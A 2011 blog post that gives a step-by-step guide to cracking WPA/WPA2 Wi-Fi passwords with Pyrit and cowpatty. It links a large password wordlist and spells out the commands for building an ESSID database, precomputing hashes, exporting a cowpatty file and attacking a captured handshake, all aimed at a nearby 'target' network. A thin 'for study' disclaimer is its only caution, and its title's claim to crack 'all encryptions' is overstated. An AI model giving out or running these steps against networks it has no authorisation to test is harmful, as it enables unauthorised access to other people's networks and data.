Saturday, September 24, 2011

WiFi Cracking All Encryptions :)

Well Here is another way for Cracking WireLess passwords for all Encryptions.

Note: Cracking/Hacking the Wireless passwords is crime, and shouldn't be used illegally. This post is mainly to study. I take no responsibilities for what you do with this.

Ok here lets get started First we need lot of Passwords , yes what ever you have in your brain is right this is Bruting . :)

Don't worry about password download from here 66 Million Common Wireless passwords .

First make Sure that you have All the below Requirements

A Pentesting Operating System like Backtrack / Blackubuntu etc
A Wireless Connection available nearby ( can be any encyption )
A Laptop with compatible wireless card.
Pyrit -> Software ( download search in google )

Now Load up the Operating System

First You need to create the ESSID for that you need the SSID of the Target Wireless

What is SSID ?
Name of the Wireless without any mistake with spaces Spl characters if available

Type the Below Command to create the information using ESSID

Create ESSID:
pyrit -e [SSID] create_essid

In the Place of [SSID] type the target SSID :)


Read file into database:
The File you have downloaded ( passwords )

pyrit -i [Location and wordlist file] import_passwords

[Location and wordlist file] => The Passwords where did you save (complete path)

At this point, all of the words will have been added into the database. This can use over 1 GB of RAM sometimes, just as a warning. Once read into the database, you can batch process the word list for all SSIDs you have added into the database:
Now type

pyrit batch

This will take quite a while, depending on your system. If you have enabled Pyrit to use GPU acceleration it will speed things up considerably. But if you have a system that is a few years old, you might be waiting for a little while.

So once that is done, you can use the pre-computed file to attack WPA networks faster or export the file to be used on another system. This is how you export the file:

Type the following

pyrit batch -e [SSID] -o [File to be written to]

[SSID]=> Target SSID
[File to be written to] => where you want to write the file

This will write out the database for that specific SSID to a cowpatty binary file. That can then be used with cowpatty on any system and gives a speed performance of ~1000x compared to a straight dictionary attack. Exporting the file this way is also relatively fast, taking about the same amount of time as using pyrit itself to attack that capture file. Only problem is that the pyrit database is very slow to export as a db file and is essentially useless to try doing that because of the slow speed. The db file is designed to be used with Aircrack, but don't waste your time. Pyrit has awesome support for cowpatty and it is extremely efficient.

For use with cowpatty:

cowpatty -r [capture file] -d [Cowpatty binary file] -s [SSID]

Performance is improved by 1000x by using this method.

Hopefully this helps out for if you want to attempt to crack a WPA/WPA2 network. Pre-computing takes almost as long as what it would if you were using the word list directly for guessing the password. The advantage: you can use it on any network with the same SSID. So spending that little bit of extra time, or just leaving it going over night, will prove valuable over a long period of time cracking WPA networks.

If you are unable to generate a hash file relatively fast and effectively using your own system, I can generate one for you. I will then distribute it via torrent. It takes a substantial amount of time for me to write out the data to a file just because I am booting Blackbuntu off of a USB right now. So it will probably take a good 12 hours for me to get the file to you. Currently trying to find faster methods of getting it transferred (ie. using an ethernet, USB3, or eSata external storage device for Blackbuntu, possibly even a small SSD).

0 comments for "WiFi Cracking All Encryptions :)"

Post a Comment